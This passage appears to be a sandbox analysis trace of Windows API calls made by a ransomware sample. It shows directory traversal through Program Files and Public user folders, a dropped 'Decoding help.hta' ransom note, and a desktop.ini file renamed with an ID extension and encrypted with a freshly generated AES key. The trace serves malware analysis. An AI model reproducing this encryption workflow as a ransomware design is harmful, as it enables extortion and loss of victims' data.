lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.395] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.395] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common7", cAlternateFileName="")) returned 1 [0039.395] lstrcmpW (lpString1=".", lpString2="Common7") returned -1 [0039.395] lstrcmpW (lpString1="..", lpString2="Common7") returned -1 [0039.395] lstrcmpiW (lpString1="windows", lpString2="Common7") returned 1 [0039.397] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*" [0039.397] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*") returned 56 [0039.397] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\", lpString2="Common7" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7" [0039.397] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*" [0039.397] GlobalMemoryStatus (in: lpBuffer=0x6d8fd10 | out: lpBuffer=0x6d8fd10) [0039.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9942b20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0039.411] CloseHandle (hObject=0x128) returned 1 [0039.411] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SDK", cAlternateFileName="")) returned 1 [0039.411] lstrcmpW (lpString1=".", lpString2="SDK") returned -1 [0039.411] lstrcmpW (lpString1="..", lpString2="SDK") returned -1 [0039.411] lstrcmpiW (lpString1="windows", lpString2="SDK") returned 1 [0039.413] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*" [0039.413] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*") returned 56 [0039.413] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\", lpString2="SDK" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK" [0039.413] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\*.*" [0039.413] GlobalMemoryStatus (in: lpBuffer=0x6d8fd10 | out: lpBuffer=0x6d8fd10) [0039.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99bad28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0039.428] CloseHandle (hObject=0x128) returned 1 [0039.428] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0039.428] lstrcmpW (lpString1=".", lpString2="VSTA") returned -1 [0039.429] lstrcmpW (lpString1="..", lpString2="VSTA") returned -1 [0039.429] lstrcmpiW (lpString1="windows", lpString2="VSTA") returned 1 [0039.429] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*" [0039.429] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*") returned 56 [0039.429] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\", lpString2="VSTA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA" [0039.429] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\*.*" [0039.429] GlobalMemoryStatus (in: lpBuffer=0x6d8fd10 | out: lpBuffer=0x6d8fd10) [0039.429] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cd84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0039.448] CloseHandle (hObject=0x128) returned 1 [0039.448] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 0 [0039.448] FindClose (in: hFindFile=0x5a5530 | out: hFindFile=0x5a5530) returned 1 Thread: id = 64 os_tid = 0xb34 [0039.407] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\*.*", lpFindFileData=0x6ecfd30 | out: lpFindFileData=0x6ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a54b0 [0039.407] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.407] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x6ecfd30 | out: lpFindFileData=0x6ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.407] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.408] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x6ecfd30 | out: lpFindFileData=0x6ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0039.408] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0039.408] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0039.408] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0039.409] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\*.*" [0039.409] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\*.*") returned 32 [0039.409] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft" [0039.409] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\*.*" [0039.409] GlobalMemoryStatus (in: lpBuffer=0x6ecfd10 | out: lpBuffer=0x6ecfd10) [0039.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99a2cc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0039.426] CloseHandle (hObject=0x134) returned 1 [0039.427] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x6ecfd30 | out: lpFindFileData=0x6ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0039.427] FindClose (in: hFindFile=0x5a54b0 | out: hFindFile=0x5a54b0) returned 1 Thread: id = 65 os_tid = 0xb38 [0039.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*.*", lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5570 [0039.423] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.423] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.424] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.424] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.424] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0039.424] lstrcmpW (lpString1=".", lpString2="Desktop") returned -1 [0039.424] lstrcmpW (lpString1="..", lpString2="Desktop") returned -1 [0039.424] lstrcmpiW (lpString1="windows", lpString2="Desktop") returned 1 [0039.426] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.426] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.426] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Desktop" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop") returned="\\\\?\\C:\\Users\\Public\\Desktop" [0039.426] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" [0039.426] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a1aec8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.447] CloseHandle (hObject=0x18c) returned 1 [0039.447] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.447] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.447] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.447] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Decoding help.hta" [0039.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Decoding help.hta" (normalized: "c:\\users\\public\\decoding help.hta")) returned 0xffffffff [0039.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Decoding help.hta" (normalized: "c:\\users\\public\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0039.472] WriteFile (in: hFile=0x1e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x700fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x700fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.473] CloseHandle (hObject=0x1e0) returned 1 [0039.473] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.473] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0039.473] lstrlenW (lpString="desktop.ini") returned 11 [0039.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.473] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.473] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\desktop.ini" [0039.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\desktop.ini" [0039.473] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0039.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0039.474] CreateFileMappingA (hFile=0x1e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x198 [0039.474] CryptAcquireContextA (in: phProv=0x700fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x700fcec*=0x5b0220) returned 1 [0039.475] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0x700fce8 | out: phKey=0x700fce8*=0x5a52f0) returned 1 [0039.475] CryptExportKey (in: hKey=0x5a52f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x700fbe4, pdwDataLen=0x700fce4 | out: pbData=0x700fbe4*, pdwDataLen=0x700fce4*=0x2c) returned 1 [0039.475] MapViewOfFile (hFileMappingObject=0x198, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0) returned 0x2d0000 [0039.476] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x700fbe4*, pdwDataLen=0x700fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x700fbe4*, pdwDataLen=0x700fcf8*=0x100) returned 1 [0039.477] CryptEncrypt (in: hKey=0x5a52f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x700fce4*=0xa0, dwBufLen=0xa0 | out: pbData=0x2d0000*, pdwDataLen=0x700fce4*=0xa0) returned 1 [0039.477] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.477] CloseHandle (hObject=0x198) returned 1 [0039.477] CryptDestroyKey (hKey=0x5a52f0) returned 1 [0039.477] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.477] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.477] WriteFile (in: hFile=0x1e0, lpBuffer=0x700fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x700fcf8, lpOverlapped=0x0 | out: lpBuffer=0x700fbe4*, lpNumberOfBytesWritten=0x700fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.478] WriteFile (in: hFile=0x1e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x700fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x700fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.478] CloseHandle (hObject=0x1e0) returned 1 [0039.479] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.480] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0039.480] lstrcmpW (lpString1=".", lpString2="Documents") returned -1 [0039.480] lstrcmpW (lpString1="..", lpString2="Documents") returned -1 [0039.480] lstrcmpiW (lpString1="windows", lpString2="Documents") returned 1 [0039.480] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.480] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.480] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Documents" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents") returned="\\\\?\\C:\\Users\\Public\\Documents" [0039.480] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\*.*" [0039.480] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d08590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.498] CloseHandle (hObject=0x1e0) returned 1 [0039.498] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0039.498] lstrcmpW (lpString1=".", lpString2="Downloads") returned -1 [0039.498] lstrcmpW (lpString1="..", lpString2="Downloads") returned -1 [0039.498] lstrcmpiW (lpString1="windows", lpString2="Downloads") returned 1 [0039.500] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.500] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.500] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Downloads" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads") returned="\\\\?\\C:\\Users\\Public\\Downloads" [0039.500] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Downloads", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\Public\\Downloads\\*.*" [0039.500] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.500] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9adb208, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.511] CloseHandle (hObject=0x1e0) returned 1 [0039.511] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0039.511] lstrcmpW (lpString1=".", lpString2="Favorites") returned -1 [0039.511] lstrcmpW (lpString1="..", lpString2="Favorites") returned -1 [0039.511] lstrcmpiW (lpString1="windows", lpString2="Favorites") returned 1 [0039.511] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.511] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.511] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Favorites" | out: lpString1="\\\\?\\C:\\Users\\Public\\Favorites") returned="\\\\?\\C:\\Users\\Public\\Favorites" [0039.511] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Favorites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\Public\\Favorites\\*.*" [0039.511] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d205f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.517] CloseHandle (hObject=0x1e0) returned 1 [0039.518] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0039.518] lstrcmpW (lpString1=".", lpString2="Libraries") returned -1 [0039.518] lstrcmpW (lpString1="..", lpString2="Libraries") returned -1 [0039.518] lstrcmpiW (lpString1="windows", lpString2="Libraries") returned 1 [0039.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.519] lstrlenW 